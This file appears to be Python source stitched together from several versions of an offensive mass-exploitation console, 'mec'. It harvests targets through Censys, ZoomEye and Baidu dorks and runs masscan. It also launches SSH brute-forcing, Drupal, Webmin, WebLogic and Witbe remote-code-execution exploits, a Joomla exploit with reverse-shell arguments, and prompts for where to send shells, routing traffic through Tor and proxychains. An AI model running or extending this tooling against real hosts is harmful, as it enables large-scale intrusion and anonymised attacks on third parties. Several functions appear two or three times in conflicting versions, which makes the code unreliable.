def run_info(**kwargs):
"""
mec status
"""
session = kwargs.get("session", None)
if session.shadowsocks.is_usable():
session.proxy_status = "OK"
colors.colored_print(
f'''
session
-------
[*] Current directory: {os.getcwd()}
[*] Root directory: {session.init_dir}
[*] Log file: {session.logfile}
[*] Target: {session.ip_list}
PROXY
-----
[*] Shadowsocks config: {session.shadowsocks.ss_url}
[*] Shadowsocks local port: {session.shadowsocks.local_port}
[*] Shadowsocks connectivity: {session.proxy_status}
''', colors.CYAN)
def start_install():
'''
installation procedure
'''
# virtualenv
os.system('mkdir ~/.mec')
os.system('cp -R ./* ~/.mec')
if not os.path.isdir("~/.mec/.venv"):
if os.system("virtualenv -p /usr/bin/python3 ~/.mec/.venv") != 0:
colors.colored_print("Error setting up virtualenv", colors.RED)
sys.exit(1)
venv_py = "~/.mec/.venv/bin/python3"
# for user interface and autocompletion
pip_install(venv_py, 'readline')
# for HTTP jobs
pip_install(venv_py, 'requests')
# psutil for killing procs by name
pip_install(venv_py, 'psutil')
# tqdm for progress bar
pip_install(venv_py, 'tqdm')
# install beatifulsoup4 if not already installed
pip_install(venv_py, 'bs4')
# install HTML5lib if not already installed
pip_install(venv_py, 'html5lib')
# install docopt if not already installed
pip_install(venv_py, 'docopt')
print(colors.BLUE + "Done installing dependencies, now copying files." +
colors.END)
# clean temp files.
os.system('rm -rf ~/.mec/mec')
os.system('rm -rf ~/.mec/install.py')
# zoomeye account:
zoomeye = str(input('Would you like to use zoomeye? (yes/No) ')).lower()
if zoomeye in ('yes', 'y'):
user = str(input('Username: '******'Password: '******'/conf/zoomeye.conf', "w")
conf.write("user:"******"\n")
conf.write("password:"******"\n")
censys = str(input('Would you like to use censys? (yes/No) ')).lower()
if censys in ('yes', 'y'):
uid = str(input('API ID: '))
sec = str(getpass.getpass('Secret: '))
conf2 = open(MECROOT + '/conf/censys.conf', "w")
key = {"uid": uid, "sec": sec}
conf2.write(json.dumps(key))
if not os.path.isfile("/usr/local/bin/mec"):
# add mec to $PATH
os.system('sudo cp mec /usr/local/bin/')
# fix permissions
os.system('sudo chmod +x /usr/local/bin/mec && chmod +x ~/.mec/mec.py')
print(colors.GREEN + colors.BOLD + "Installation completed. try: $ mec" +
colors.END)
def run_search(query, pages):
i = 0
hosts = []
censys_search = CensysSearch()
# check account
account_info = censys_search.query_account()
if account_info == "":
return ""
colors.colored_print(account_info, colors.BLUE)
while i <= int(pages):
i += 1
sys.stdout.flush()
sys.stdout.write(
f"{colors.BLUE}[+] Crawling page {i}...{colors.END}\r")
# multi thread causes temp ban.
hosts = hosts + censys_search.search_hosts(query, i)
print()
out_name = query + ".txt"
for special_ch in ['"', "'", ':', '!', '\\', '/']:
if special_ch in out_name:
out_name = out_name.replace(special_ch, '-')
file = 'data/censys_' + out_name
out = open(file, "a")
print(str(len(hosts)) + " Host found.")
out.write("\n".join(str(x) for x in hosts))
return file
def run_info(**kwargs):
"""
mec status
"""
session = kwargs.get("session", None)
if session is None:
console.print_error("[-] info: session not exist")
return
# update via user config file
session.read_config()
if session.shadowsocks.is_usable():
session.proxy_status = "OK"
colors.colored_print(
f'''
session
-------
[*] Auto-Update: {session.auto_update}
[*] Current directory: {os.getcwd()}
[*] Root directory: {session.init_dir}
[*] Log file: {session.logfile}
[*] Target: {session.ip_list}
proxy
-----
[*] Shadowsocks config: {session.shadowsocks.ss_url}
[*] Shadowsocks local port: {session.shadowsocks.local_port}
[*] Shadowsocks connectivity: {session.proxy_status}
''', colors.CYAN)
def ssh_bruteforcer(session):
'''
bruteforce one target using a password list
'''
colors.colored_print('\n[*] Welcome to SSH bruteforcer', colors.BLUE)
password_list = console.input_check(
"[*] Password list file to use (put them under ./data): ", allow_blank=False,
choices=glob.glob(core.MECROOT+"/data/*.txt"))
if not os.path.isfile(password_list):
console.print_error("[-] Password list not found")
return None
# command to exec
command = console.input_check("[*] Command to exec: ", allow_blank=False)
# args list
exploit = 'ssh_bruteforce.py'
work_path = '/ssh-bruteforce/'
exec_path = exploit
custom_args = ["-p", password_list, "-c", command]
jobs = 100
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def main():
'''
handles user interface
'''
colors.colored_print("[*] Default target list is ./data/ip_list.txt",
colors.CYAN)
SESSION.ip_list = SESSION.init_dir + '/data/ip_list.txt'
futil.write_file(text=f"{os.getpid()}", filepath=SESSION.pidfile)
while True:
try:
if os.getcwd() != core.MECROOT:
os.chdir(core.MECROOT)
input_cmd = rlinit.prompt(session=SESSION)
try:
cmd.cmd_handler(SESSION, input_cmd)
except (KeyboardInterrupt, EOFError, SystemExit):
sys.exit(0)
except FileNotFoundError:
console.print_error(f"[-] {core.MECROOT} not found???")
sys.exit(1)
except KeyboardInterrupt:
answ = console.yes_no("\n[?] Are you sure to exit?")
if answ:
futil.check_kill_process('ss-proxy')
sys.exit(0)
else:
continue
def run_check_proxy_pool(**kwargs):
"""
check if proxy_pool is usable
"""
session = kwargs.get("session", None)
# update via user config file
session.read_config()
# check tor
tor_status = "Unknown"
def check_tor():
# also check tor
try:
requests.get("http://ifconfig.me", timeout=10,
proxies=dict(http='socks5://127.0.0.1:9050',
https='socks5://127.0.0.1:9050'))
except BaseException:
return False
return True
def run_check(res):
res['tor_status'] = "DISCONNECTED"
if check_tor():
res['tor_status'] = "OK"
if session is None:
console.print_error("[-] info: session not exist")
return
# check proxy chain
res['proxy_status'] = "DISCONNECTED"
if session.test_proxy():
res['proxy_status'] = "OK"
if session.proxy_pool_api == '':
console.print_warning("[!] proxy_pool_api not configured")
else:
res = Manager().dict()
proc = Process(target=run_check, args=(res,))
proc.start()
console.print_status(
"[*] please wait while checking proxy chain connectivity...",
proc
)
proc.join()
tor_status = res['tor_status']
session.proxy_status = res['proxy_status']
colors.colored_print(f"""
proxy
-----
[*] proxy_pool API: {session.proxy_pool_api}
[*] tor connectivity: {tor_status}
[*] proxy chain connectivity: {session.proxy_status}
""", colors.CYAN)
def pkg_install(pkg_mgr, pkg):
'''
install package via system package manager
'''
if os.system("{} {} -y".format(pkg_mgr, pkg)) != 0:
colors.colored_print(
"Could not install {}, some pypi packages might fail to install".
format(pkg), colors.RED)
def run_init(**kwargs):
"""
Return to init directory
"""
session = kwargs.get("session")
colors.colored_print('[*] Going back to init_dir...', colors.BLUE)
os.chdir(session.init_dir)
def start_install():
'''
installation procedure
'''
# virtualenv
os.system('mkdir ~/.mec')
os.system('cp -R ./* ~/.mec')
if not os.path.isdir("~/.mec/.venv"):
if os.system("virtualenv -p /usr/bin/python3 ~/.mec/.venv") != 0:
colors.colored_print("Error setting up virtualenv", colors.RED)
sys.exit(1)
venv_py = "~/.mec/.venv/bin/python3"
# use requirements.txt
pip_install(venv_py, '-r requirements.txt')
print(colors.BLUE + "Done installing dependencies, now copying files." +
colors.END)
# clean temp files.
os.system('rm -rf ~/.mec/mec')
os.system('rm -rf ~/.mec/install.py')
# zoomeye account:
zoomeye = str(input('Would you like to use zoomeye? (yes/No) ')).lower()
if zoomeye in ('yes', 'y'):
user = str(input('Username: '******'Password: '******'/conf/zoomeye.conf', "w")
conf.write("user:"******"\n")
conf.write("password:"******"\n")
censys = str(input('Would you like to use censys? (yes/No) ')).lower()
if censys in ('yes', 'y'):
uid = str(input('API ID: '))
sec = str(getpass.getpass('Secret: '))
conf2 = open(MECROOT + '/conf/censys.conf', "w")
key = {"uid": uid, "sec": sec}
conf2.write(json.dumps(key))
if not os.path.isfile("/usr/local/bin/mec"):
# add mec to $PATH
os.system('sudo cp mec /usr/local/bin/')
# fix permissions
os.system('sudo chmod +x /usr/local/bin/mec && chmod +x ~/.mec/mec.py')
print(colors.GREEN + colors.BOLD + "Installation completed. try: $ mec" +
colors.END)
def run_exploits(**kwargs):
"""
List all usable exploits
"""
do_print = kwargs.get("do_print", True)
exp_list = futil.list_exp()
if not do_print:
# pass this list to readline completer
return exp_list
colors.colored_print('[+] Available exploits: ', colors.CYAN)
for poc in exp_list:
colors.colored_print(poc, colors.BLUE)
return None
def run_target(**kwargs):
"""
Change target list
"""
session = kwargs.get("session")
target = kwargs.get("args")[0]
if target not in os.listdir(session.init_dir + '/data'):
console.print_error("[-] Target file not found")
return
colors.colored_print('[i] Target changed to {}'.format(target),
colors.BLUE)
session.ip_list = session.init_dir + \
'/data/' + target
def run_censys(**kwargs):
"""
Crawler for Censys.io
"""
session = kwargs.get("session", None)
try:
output = censys.start()
if console.yes_no("\n[?] Use collected URLs as target?"):
session.ip_list = session.init_dir + "/" + output
colors.colored_print(
'[i] Target changed to {}'.format(
session.ip_list), colors.BLUE)
except BaseException:
return
def run_info(**kwargs):
"""
mec status
"""
session = kwargs.get("session", None)
# update via user config file
session.read_config()
colors.colored_print(f'''
session
-------
[*] Auto-Update: {session.auto_update}
[*] Current directory: {os.getcwd()}
[*] Root directory: {session.init_dir}
[*] Log file: {session.logfile}
[*] Target: {session.ip_list}
''', colors.CYAN)
def run_target(**kwargs):
"""
Change target list
"""
session = kwargs.get("session")
try:
target = kwargs.get("args")[0]
except IndexError:
console.print_error("[-] What target?")
return
if target not in os.listdir(session.init_dir + '/data'):
console.print_error(f"[-] Target list file '{target}' not found")
return
colors.colored_print(
'[i] Target list changed to {}'.format(target), colors.BLUE)
session.ip_list = session.init_dir + \
'/data/' + target
def drupal_cve20196340(session):
'''
drupal RCE
'''
colors.colored_print('\n[*] Welcome to Drupal CVE-2019-6340', colors.BLUE)
# shell server config
command = console.input_check('[?] Command to execute on the target: ',
allow_blank=False)
# exploit config
exploit = 'cve-2019-6340_cmd.py'
work_path = '/drupal/'
exec_path = exploit
custom_args = ["-c", command]
jobs = 50
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, 0.1, session)
def webmin_cve_2019_15107(session):
'''
CVE_2019_15107 RCE
'''
colors.colored_print('\n[*] Welcome to Webmin CVE-2019-15107', colors.BLUE)
# shell server config
command = console.input_check(
'[?] Command to execute on the target: ', allow_blank=False)
# exploit config
exploit = 'webmin.py'
work_path = '/webmin/'
exec_path = exploit
custom_args = ["-c", command]
jobs = 50
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def witbe(session):
'''
witbe rce
'''
colors.colored_print('\n[*] Welcome to Witbe RCE', colors.BLUE)
# shell server config
rhost = console.input_check('[?] IP of your shell server: ', ip_check=True)
rport = console.input_check('[?] and Port? ', check_type=int)
# exploit config
exploit = 'witbe.py'
work_path = '/witbe/'
exec_path = exploit
custom_args = ["-l", rhost, "-p", rport]
jobs = 50
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def weblogic_cve201710271(session):
'''
CVE-2017-10271
'''
colors.colored_print(
'\n[*] Welcome to Weblogic CVE-2017-10271', colors.BLUE)
# shell server config
command = console.input_check(
'[?] Command to execute on the target: ', allow_blank=False)
# exploit config
exploit = 'weblogic_cve-2017-10271.py'
work_path = '/weblogic/'
exec_path = exploit
custom_args = ["-c", command]
jobs = 50
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def run_exploits(**kwargs):
"""
List all usable exploits
"""
do_print = kwargs.get("do_print", True)
exp_list = futil.list_exp()
if len(exp_list) == 0:
console.print_error("[-] No exploits found")
if console.yes_no("[?] Perhaps you need to check `info`?"):
run_info(session=kwargs.get("session"))
if not do_print:
return exp_list
colors.colored_print(f"[+] {len(exp_list)} available exploits: ",
colors.CYAN)
for poc in exp_list:
colors.colored_print(poc, colors.BLUE)
return None
def run_baidu(**kwargs):
"""
Search via m.baidu.com
"""
session = kwargs.get("session")
command = kwargs.get("args")
try:
dork = command[0]
count = int(command[1])
os.chdir(session.out_dir)
colors.colored_print('[*] Searching on Baidu...', colors.PURPLE)
baidu.spider(dork, count)
if console.yes_no("\n[?] Use collected URLs as target?"):
session.ip_list = session.out_dir + "/result.txt"
except (EOFError, KeyboardInterrupt, SystemExit):
console.print_warning("[-] Interrupted")
return
except BaseException as exc:
console.print_error(f"[-] Error: {exc}")
console.debug_except()
def weblogic_cve201710271(session):
'''
CVE-2017-10271
'''
colors.colored_print('\n[*] Welcome to Weblogic CVE-2017-10271',
colors.BLUE)
# shell server config
command = console.input_check('[?] Command to execute on the target: ',
allow_blank=False)
target_os = console.input_check(
"[?] Target OS, default to linux [linux/win]: ",
choices=["linux", "win"])
# exploit config
exploit = 'weblogic_cve-2017-10271.py'
work_path = '/weblogic/'
exec_path = exploit
custom_args = ["-c", command, "-os", target_os]
jobs = 50
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, 0.1, session)
def execute(cmd):
'''
handles user input in console
'''
# lol i don't want any errors here
cmd = str(cmd).lower().strip()
if cmd == '':
return
elif cmd == 'info':
colored_print(
'[*] Current directory: {}\
\n[*] Init directory: {}\
\n[*] Log file: {}\
\n[*] Target: {}\
\n[*] Proxy config: {}'.format(
os.getcwd(),
SESSION.init_dir,
SESSION.logfile,
SESSION.ip_list,
SESSION.proxy_conf),
colors.CYAN)
elif cmd.startswith('target'):
target = ''.join(cmd.split()[1:])
if target not in os.listdir(SESSION.init_dir + '/data'):
return
colored_print('[i] Target changed to {}'.format(target), colors.BLUE)
SESSION.ip_list = SESSION.init_dir + \
'/data/' + target
elif cmd == 'init' or cmd == 'i':
colored_print('[*] Going back to init_dir...', colors.BLUE)
os.chdir(SESSION.init_dir)
elif cmd.startswith('baidu'):
try:
command = cmd.strip().split()
dork = command[1]
count = int(command[2])
os.chdir(SESSION.out_dir)
colored_print('[*] Searching on Baidu...', colors.PURPLE)
baidu.spider(dork, count)
except (IndexError, EOFError, KeyboardInterrupt, SystemExit):
return
elif cmd == 'proxy':
if not os.path.exists(SESSION.ss_config):
console.print_error(
'[-] Please make sure {} exists'.format(SESSION.ss_config))
try:
subprocess.Popen(
[SESSION.proxy_bin,
'-c',
SESSION.ss_config],
stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=False)
except BaseException as err:
console.print_error(
'[-] Error starting Shadowsocks proxy: ' + str(err))
debug_except()
elif cmd == 'redis':
console.print_error('[-] Under development')
elif cmd.startswith('google'):
try:
cmd = cmd.strip().split()
dork = cmd[1]
# well yes im a lazy guy
subprocess.call(['./exploits/joomla/joomlaCVE-2015-8562.py',
'--dork', dork,
'--revshell=\'127.0.0.1\'',
'--port=4444'])
except BaseException as err:
console.print_error(str(err))
debug_except()
elif cmd == 'q' or cmd == 'quit':
check_kill_process('ss-proxy')
sys.exit(0)
elif cmd == 'h' or cmd == 'help' or cmd == '?':
print(console.HELP_INFO)
elif cmd == 'exploits':
colored_print('[+] Available exploits: ', colors.CYAN)
for poc in list_exp():
colored_print(poc, colors.BLUE)
elif cmd == 'z' or cmd == "zoomeye":
try:
zoomeye.run()
except (EOFError, KeyboardInterrupt, SystemExit):
pass
else:
debug_except()
elif cmd == 'x' or cmd == 'clear':
os.system("clear")
elif cmd == 'c' or cmd == 'reset':
os.system("reset")
elif cmd == "attack" or cmd == "e":
attack()
else:
try:
print(
colors.BLUE +
colors.BOLD +
"[*] Exec: " +
colors.END +
colors.GREEN +
cmd +
colors.END +
'\n')
os.system(cmd)
except (EOFError, KeyboardInterrupt, SystemExit):
pass
def mod_exists(modulename):
'''
check if a module exists without importing it
'''
mod_spec = util.find_spec(modulename)
return mod_spec is not None
# distro check and initial packages
DIST = "debian"
try:
import distro
except ModuleNotFoundError:
if os.system("python3 -m pip install distro --user") != 0:
colors.colored_print("Please install pip first !!!", colors.RED)
sys.exit(1)
if mod_exists("distro"):
import distro
except ImportError:
colors.colored_print("Please use python 3.6+ !!!", colors.RED)
sys.exit(1)
try:
DIST = distro.linux_distribution(full_distribution_name=False)[0]
except NameError:
import platform
# pylint: disable=deprecated-method
DIST = platform.linux_distribution(full_distribution_name=0)[0].lower()
def attack():
'''
handles attack command
'''
SESSION.use_proxy = input_check(
'[?] Do you wish to use proxychains? [y/n] ', choices=['y',
'n']) == 'y'
if SESSION.use_proxy:
if shutil.which("proxychains4") is None:
console.print_error("proxychains4 not found")
return
execute("proxy")
answ = input_check('\n[?] Do you wish to use\
\n\n [a] built-in exploits\
\n [m] or launch your own manually?\
\n\n[=] Your choice: ',
choices=['a', 'm'])
if answ == 'a':
print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' +
colors.END + '\n')
print(console.BUILT_IN)
answ = input_check('[=] Your choice: ',
check_type=int,
choices=['0', '1', '2', '3', '4'])
try:
if answ == '0':
scanner(exploit_exec.ssh_bruteforcer())
elif answ == '1':
scanner(exploit_exec.weblogic())
elif answ == '2':
console.print_error("[-] Not available")
elif answ == '3':
console.print_error("[-] Not available")
elif answ == '4':
scanner(exploit_exec.s2_045())
except (EOFError, KeyboardInterrupt, SystemExit):
return
elif answ == 'm':
print(colors.CYAN + colors.UNDERLINE + colors.BOLD +
"\nWelcome, in here you can choose your own exploit\n" +
colors.END)
colored_print('[*] Here are available exploits:\n', colors.CYAN)
for poc in list_exp():
colored_print(poc + colors.END, colors.BLUE)
exploit = input_check(
"\n[*] Enter the path (eg. joomla/rce.py) of your exploit: ",
choices=list_exp())
jobs = int(
input_check("[?] How many processes each time? ", check_type=int))
custom_args = []
answ = input_check("[?] Do you need a reverse shell [y/n]? ",
choices=['y', 'n'])
if answ == 'y':
lhost = input_check("[*] Where do you want me to send shells? ",
allow_blank=False,
ip_check=True)
lport = input_check("[*] and at what port?", check_type=int)
custom_args = ['-l', lhost, '-p', lport]
else:
pass
custom_args += input_check(
"[*] args for this exploit: ").strip().split()
# parse user's exploit name
exec_path = exploit.split('/')[1:]
work_path = exploit.split('/')[:-1]
exec_path = '/'.join(exec_path)
work_path = '/'.join(work_path)
# let user check if there's anything wrong
print(
colors.BLUE + '[*] Your exploit will be executed like\n' +
colors.END,
'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(
exec_path), ' '.join(custom_args))
# args as parameter for scanner
scanner_args = console.ScannerArgs(work_path, exec_path, custom_args,
jobs)
# start scanner
scanner(scanner_args)
else:
console.print_error('[-] Invalid input')
def execute(cmd):
'''
handles user input in console
'''
# lol i don't want any errors here
cmd = str(cmd).lower().strip()
if cmd == '':
return
if cmd == "masscan":
# check root, as masscan requires root privilege
if os.geteuid() != 0:
console.print_error(
"[-] Please run mec as root in order to run masscan")
return
ports = console.input_check(
"[?] What ports do you want to scan (eg. 80 443)? ").split()
try:
scan.masscan(ports)
except KeyboardInterrupt:
console.print_warning("[-] masscan exited")
elif cmd == 'info':
colored_print(
'[*] Current directory: {}\
\n[*] Init directory: {}\
\n[*] Log file: {}\
\n[*] Target: {}\
\n[*] Proxy config: {}'.format(os.getcwd(), SESSION.init_dir,
SESSION.logfile, SESSION.ip_list,
SESSION.proxy_conf), colors.CYAN)
elif cmd.startswith('target'):
target = ''.join(cmd.split()[1:])
if target not in os.listdir(SESSION.init_dir + '/data'):
console.print_error("[-] Target file not found")
return
colored_print('[i] Target changed to {}'.format(target), colors.BLUE)
SESSION.ip_list = SESSION.init_dir + \
'/data/' + target
elif cmd in ('init', 'i'):
colored_print('[*] Going back to init_dir...', colors.BLUE)
os.chdir(SESSION.init_dir)
elif cmd.startswith('baidu'):
try:
command = cmd.strip().split()
dork = command[1]
count = int(command[2])
os.chdir(SESSION.out_dir)
colored_print('[*] Searching on Baidu...', colors.PURPLE)
baidu.spider(dork, count)
if yes_no("Use collected URL's as target?"):
SESSION.ip_list = SESSION.init_dir + "result.txt"
except (IndexError, EOFError, KeyboardInterrupt, SystemExit):
return
elif cmd == 'proxy':
if not os.path.exists(SESSION.ss_config):
console.print_error('[-] Please make sure {} exists'.format(
SESSION.ss_config))
try:
subprocess.Popen([SESSION.proxy_bin, '-c', SESSION.ss_config],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
shell=False)
except BaseException as err:
console.print_error('[-] Error starting Shadowsocks proxy: ' +
str(err))
debug_except()
elif cmd == 'redis':
console.print_error('[-] Under development')
elif cmd.startswith('google'):
try:
cmd = cmd.strip().split()
dork = cmd[1]
# well yes im a lazy guy
subprocess.call([
'./exploits/joomla/joomlaCVE-2015-8562.py', '--dork', dork,
'--revshell=\'127.0.0.1\'', '--port=4444'
])
except BaseException as err:
console.print_error(str(err))
debug_except()
elif cmd in ('q', 'quit'):
check_kill_process('ss-proxy')
sys.exit(0)
elif cmd in ('h', 'help', '?'):
print(console.HELP_INFO)
elif cmd == 'exploits':
colored_print('[+] Available exploits: ', colors.CYAN)
for poc in list_exp():
colored_print(poc, colors.BLUE)
elif cmd in ('z', "zoomeye"):
try:
console.print_warning(
"[*] ZoomEye now asks for phone verification (+86 only)")
zoomeye.run()
except (EOFError, KeyboardInterrupt, SystemExit):
pass
else:
debug_except()
elif cmd == "censys":
try:
output = censys.start()
if yes_no("Use collected URL's as target?"):
SESSION.ip_list = SESSION.init_dir + "/" + output
colored_print(
'[i] Target changed to {}'.format(SESSION.ip_list),
colors.BLUE)
except BaseException:
return
elif cmd in ('x', 'reset'):
os.system("reset")
elif cmd in ('c', 'clear'):
os.system("clear")
elif cmd in ("attack", "e"):
attack()
else:
try:
print(colors.BLUE + colors.BOLD + "[*] Exec: " + colors.END,
colors.GREEN + cmd, colors.END)
os.system(cmd)
except (EOFError, KeyboardInterrupt, SystemExit):
return
def pip_install(venv_py, pkg):
'''
python3 -m pip install pkg
'''
colors.colored_print("Installing {} ... ".format(pkg), colors.BLUE)
os.system('{} -m pip install {}'.format(venv_py, pkg))
def mod_exists(modulename):
'''
check if a module exists without importing it
'''
mod_spec = util.find_spec(modulename)
return mod_spec is not None
# distro check and initial packages
DIST = "debian"
try:
import distro
except ModuleNotFoundError:
if os.system("python3 -m pip install distro --user") != 0:
colors.colored_print("Please install pip first !!!", colors.RED)
sys.exit(1)
if mod_exists("distro"):
import distro
except ImportError:
colors.colored_print("Please use python 3.6+ !!!", colors.RED)
sys.exit(1)
try:
DIST = distro.linux_distribution(full_distribution_name=False)[0]
except NameError:
import platform
# pylint: disable=deprecated-method, no-member
DIST = platform.linux_distribution(full_distribution_name=0)[0].lower()
def attack(self):
'''
handles attack command
'''
self.use_proxy = console.yes_no(
'[?] Do you wish to use proxy_pool/proxychains?')
if self.use_proxy:
if shutil.which("proxychains4") is None:
console.print_error("proxychains4 not found")
return
# sleep between two subprocess open
sleep_seconds = console.input_check("\n[?] Wait how many seconds" +
" before each process launch?\n" +
" (Set it to 0 when you want to use 100% CPU" +
" / bandwidth\n Recommened value: 0.1)\n" +
"\n[=] Your input: ",
check_type=float)
answ = console.input_check(
'\n[?] Do you wish to use\
\n\n [1] built-in exploits\
\n [2] or launch your own manually?\
\n\n[=] Your choice: ',
choices=['1', '2', 'built-in', 'manually'])
if answ in ['1', 'built-in']:
print(
colors.CYAN +
colors.BOLD +
'\n[?] Choose a module from: ' +
colors.END +
'\n')
colors.colored_print(futil.BUILT_IN, colors.GREEN)
module = console.input_check(
"[?] Choose your exploit module: ",
choices=futil.BUILT_IN.split('\n'),
allow_blank=False)
try:
scanner_instance = exploit_exec.EXPLOIT_DICT.get(module)(self)
if scanner_instance is None:
return
scanner_instance.sleep_seconds = sleep_seconds
scanner_instance.scan()
return
except (EOFError, KeyboardInterrupt, SystemExit):
return
# run custom exploits
print(
colors.CYAN +
colors.UNDERLINE +
colors.BOLD +
"\nWelcome, in here you can invoke your own exploit\n" +
colors.END)
cmd.run_exploits()
exploit = console.input_check(
"\n[*] Enter the path (eg. test/test) to your exploit: ",
choices=futil.list_exp())
jobs = int(
console.input_check("[?] How many processes each time? ", check_type=int))
custom_args = console.input_check(
"[*] Addtional args for this exploit (other than `-t <target>`): ").strip().split()
# parse user's exploit name
exec_path = exploit.split('/')[1:]
work_path = exploit.split('/')[:-1]
exec_path = '/'.join(exec_path)
work_path = '/'.join(work_path)
# args as parameter for scanner
scanner_instance = Scanner(work_path, exec_path,
custom_args,
jobs, sleep_seconds, self)
# start scanner
scanner_instance.scan()
